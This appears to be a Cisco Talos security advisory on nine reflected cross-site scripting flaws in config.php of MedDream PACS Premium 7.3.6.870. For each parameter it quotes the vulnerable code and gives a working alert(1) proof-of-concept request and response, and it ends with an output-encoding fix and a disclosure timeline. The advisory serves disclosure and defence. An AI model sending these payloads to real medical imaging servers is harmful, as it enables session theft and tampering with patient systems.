CVE-2025-58089, CVE-2025-58093, CVE-2025-58090, CVE-2025-58091, CVE-2025-58088, CVE-2025-58087, CVE-2025-58094, CVE-2025-58095, CVE-2025-58092
Multiple reflected cross-site scripting (XSS) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary JavaScript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.6.870
MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
6.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
Multiple reflected XSS vulnerabilities exist in the config.php script.
The value of the status parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
/// line 570
require_once 'header.php';
if (isset($_GET['status'])) {
    print "<p><font color='$BGCOLOR'>";
    print urldecode($_GET['status']); /// [1]
    print "</font>";
}
The status parameter, which is fully controllable by an attacker, is printed directly into the web page content [1].
Example of a malicious request and response containing injected HTML/JavaScript code:
REQ
GET /Pacs/config.php?status=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 12:36:55 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 21136
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<font color='#383842'><script>alert(1)</script></font>
The value of the archivedir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 70
if (isset($_POST['update'])) {
    global $BGCOLOR;
    (...)
    // default short-term archive directory
    if (isset($_POST['archivedir']) && strlen($_POST['archivedir'])) {
        $dir = cleanPostPath($_POST['archivedir']); /// [1]
        if (!file_exists($dir)) {
            print "<h3><font color=red>";
            printf(pacsone_gettext("Default Short-Term Archive Directory %s does not exist!"), $dir); /// [2]
            print "</font></h3>";
            exit();
        }
The $dir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if the directory that $dir points to does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
update=123&archivedir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 12:59:23 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4158
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
...
<div id="content">
<h3><font color=red>Default Short-Term Archive Directory <script>alert(1)</script> does not exist!</font></h3>
The value of the longtermdir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 107
// default long-term archive directory
if ($_POST['awss3'] || (isset($_POST['longtermdir']) && strlen($_POST['longtermdir']))) {
    $dir = cleanPostPath($_POST['longtermdir']); /// [1]
    (...)
    } else if (!file_exists($dir)) {
        print "<h3><font color=red>";
        printf(pacsone_gettext("Default Long-Term Archive Directory %s does not exist!"), $dir); /// [2]
        print "</font></h3>";
        exit();
    }
The longtermdir parameter, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if the directory that $dir points to does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
update=123&longtermdir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:19:38 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4157
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Default Long-Term Archive Directory <script>alert(1)</script> does not exist!</font></h3>
The value of the uploaddir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
/// line 142
// store attachment under the following upload directory
if (isset($_POST['uploaddir']) && strlen($_POST['uploaddir'])) {
    $dir = cleanPostPath($_POST['uploaddir']); /// [1]
    if (!file_exists($dir)) {
        print "<h3><font color=red>";
        printf(pacsone_gettext("Upload Directory %s does not exist!"), $dir); /// [2]
        print "</font></h3>";
        exit();
    }
The $dir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if the directory that $dir points to does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
update=123&uploaddir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:46:12 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4138
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Upload Directory <script>alert(1)</script> does not exist!</font></h3>
The value of the thumbnaildir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 161
if (isset($_POST['thumbnaildir'])) {
    if (strlen($_POST['thumbnaildir'])) {
        $dir = cleanPostPath($_POST['thumbnaildir']); /// [1]
        if (!file_exists($dir)) {
            print "<h3><font color=red>";
            printf(pacsone_gettext("Thumbnails Directory %s does not exist!"), $dir); /// [2]
            print "</font></h3>";
            exit();
        }
The $dir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if the directory that $dir points to does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
REQ
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
update=123&thumbnaildir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:48:20 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4142
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Thumbnails Directory <script>alert(1)</script> does not exist!</font></h3>
The value of the phpexe parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 215
// path to PHP runtime executable (php.exe)
if (isset($_POST['phpexe'])) {
    $phpexe = cleanPostPath($_POST['phpexe']); // [1]
    if (!file_exists($phpexe) || !is_executable($phpexe)) {
        print "<h3><font color=red>";
        printf(pacsone_gettext("%s does not exist"), $phpexe); /// [2]
        print "</font></h3>";
        exit();
    }
The $phpexe variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if the file that $phpexe points to does not exist or is not executable.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
update=123&phpexe=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:58:30 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red><script>alert(1)</script> does not exist</font></h3>
The value of the phpdir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 435
// path to non-default or user-configured directory of PHP scripts
if (isset($_POST['phpdir'])) {
    $phpdir = cleanPostPath($_POST['phpdir']); // [1]
    if (strlen($phpdir) && !file_exists($phpdir)) {
        print "<h3><font color=red>";
        printf(pacsone_gettext("Directory %s does not exist or not accessible!"), $phpdir); // [2]
        print "</font></h3>";
        exit();
    }
The $phpdir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if the directory that $phpdir points to does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
update=123&phpdir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 14:14:14 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4149
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Directory <script>alert(1)</script> does not exist or not accessible!</font></h3>
The value of the worklistsrc parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
$worklistscan = $_POST['worklistscan'];
$worklistsrc = cleanPostPath($_POST['worklistsrc']); /// [1]
if ($worklistscan) {
    $ok = true;
    if (!file_exists($worklistsrc)) {
        print "<p><font color=red>";
        printf(pacsone_gettext("Invalid Worklist Scan Source Directory: [%s]"), $worklistsrc); /// [2]
        print "</font><p>";
        $ok = false;
    }
The $worklistsrc variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if the directory that $worklistsrc points to does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/config.php?status=System+Configurations+Updated.
Content-Type: application/x-www-form-urlencoded
Content-Length: 1027
Origin: http://192.168.0.42
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
update=1&archivedir=C%3A%2F&archiveformat=0&longtermdir=&archiveage=0&age=0&agingwday=Sunday&aginghour=12%3A00+AM&agingwday2=Sunday&aginghour2=12%3A00+AM&autologout=10&passwordexpire=60&maxupload=2&skipseries=0&uploaddir=&attachment=table&thumbnaildir=&imagedir=&autoscan=0&scansrc=&scandest=&scaninterval=60&adminemail=&phpexe=C%3A%2FMDPACS%2FServer%2Fphp%2Fphp.exe&emailfailedjobs=1&worklistage=30&matchworklist=0&studyreconcil=0&worklistscan=abc&worklistsrc=%3cscript%3ealert(1)%3c%2fscript%3e&worklistinterval=60&dailyreport=on&weeklyreport=on&monthlyreport=on&journalreport=on&dateformat=US&datetimeformat=US&autoconvert=0&convertlimit=11&videoformat=0&webmargs=-cpu-used+5+-deadline+realtime&mp4args=&swfargs=&veterinary=1&charset=Default&wadosecmodel=0&wadousername=root&wadopassword=Test123&externalAccessUrl=&userfilter=0&ldapHost=&ldapPort=&ldap=0&customphp=0&customphpdhour=12%3A00+AM&customphpwday=Sunday&customphpwhour=12%3A00+AM&customphpmday=1&customphpmhour=12%3A00+AM&phpdir=&pthreadpoolsize=6&skipemptystudy=1
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 15:09:26 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4144
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
The value of the imagedir parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
// line 181
// store generated jpg/gif images the following directory
if (isset($_POST['imagedir'])) {
    if (strlen($_POST['imagedir'])) {
        $dir = cleanPostPath($_POST['imagedir']); /// [1]
        if (!file_exists($dir)) {
            print "<h3><font color=red>";
            printf(pacsone_gettext("Images Directory %s does not exist!"), $dir); /// [2]
            print "</font></h3>";
            exit();
        }
The $dir variable, which is fully controllable by an attacker [1], is printed directly into the web page content [2] if the directory that $dir points to does not exist.
Example of a malicious request and response containing injected HTML/JavaScript code:
POST /Pacs/config.php HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.0.42/Pacs/series.php?patientId=D97258%2F11053&studyId=1.3.12.2.1107.5.4.3.11540117440512.19970422.140030.45
Connection: keep-alive
Cookie: sessionCookie=%DC%07%E5Rlp%1B%AA%B8%E6%BE%F3n%FA%E9%97%C70%84%EE%D2%91x%8E%40F%12u%8D%E7%EC%5C; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
update=123&imagedir=<script>alert(1)</script>
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 13:53:22 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 4138
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<div id="content">
<h3><font color=red>Images Directory <script>alert(1)</script> does not exist!</font></h3>
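The status banner and the eight path-error messages above share one defect, and one fix: HTML-encode the value at the point of output. The following PHP sketch is an added example, not MedDream or Talos code; the helper names h, format_escaped, render_status and render_path_error are hypothetical, and the format strings are assumed to come from a trusted translation catalog.

```php
<?php
declare(strict_types=1);

// Added example. Helper names are hypothetical; this is not MedDream code.

/** Encode a value for HTML text and quoted-attribute contexts. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * sprintf() variant that HTML-encodes every argument before substitution.
 * Assumption: $format comes from the translation catalog and is trusted.
 */
function format_escaped(string $format, string ...$args): string
{
    return vsprintf($format, array_map('h', $args));
}

/** Status banner (the config.php line 570 pattern) with output encoding. */
function render_status(array $query, string $bgColor): string
{
    $status = $query['status'] ?? null;
    if (!is_string($status)) {
        return ''; // absent, or an array such as status[]=x
    }
    // PHP has already URL-decoded $_GET, so there is no second urldecode() here.
    return "<p><font color='" . h($bgColor) . "'>" . h($status) . "</font>";
}

/** "Directory does not exist" error (the archivedir, uploaddir, ... pattern). */
function render_path_error(string $format, string $path): string
{
    return '<h3><font color=red>' . format_escaped($format, $path) . '</font></h3>';
}

// Constructed inputs that mirror the requests shown on this page.
$payload = '<script>alert(1)</script>';

echo render_status(['status' => $payload], '#383842'), PHP_EOL;
echo render_path_error('Default Short-Term Archive Directory %s does not exist!', $payload), PHP_EOL;
echo render_path_error('Invalid Worklist Scan Source Directory: [%s]', $payload), PHP_EOL;
```

The captured responses already send X-XSS-Protection: 1; mode=block and X-Content-Type-Options: nosniff and still reflect the markup, and none of them shows a Content-Security-Policy header, so encoding at the sink is the control that closes these findings.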
2025-09-02 - Vendor Disclosure
2025-12-05 - Vendor Patch Release
2026-01-20 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.